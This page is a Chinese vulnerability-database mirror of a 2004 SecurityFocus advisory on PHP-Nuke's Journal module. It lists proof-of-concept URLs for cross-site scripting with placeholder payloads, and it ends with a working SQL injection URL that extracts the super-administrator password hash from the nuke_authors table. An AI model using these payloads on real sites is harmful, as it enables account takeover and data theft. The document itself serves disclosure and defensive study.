PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054504 漏洞类型
发布时间 2004-06-23 更新时间 2004-06-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24232
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10595/info

PHP-Nuke is prone to multiple vulnerabilities. The issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting, HTML injection, and SQL injection attacks.

Although unconfirmed, all versions of PHP-Nuke are considered to be vulnerable at this point. This BID will be updated as more information becomes available.

http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&yun=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=friend&jid=2&ye=[xss code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=add&filelist[]=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=modify&filelist[]=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=delete&jid=[xss
code here]&forwhat=waraxe
http://www.example.com/nuke73/modules.php?name=Journal&file=comment&onwhat=[xss
code here]
http://www.example.com/nuke73/modules.php?name=Journal&file=commentsave&rid=[xsscode here]

http://www.example.com/nuke73/modules.php?name=Journal&file=commentkill&onwhat=1
http://www.example.com/nuke73/modules.php?name=Journal&file=savenew&title=f00bar

http://www.example.com/nuke73/modules.php?name=Journal&file=search&bywhat=aid&exact=1
&forwhat=kala'/**/UNION/**/SELECT/**/0,0,pwd,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*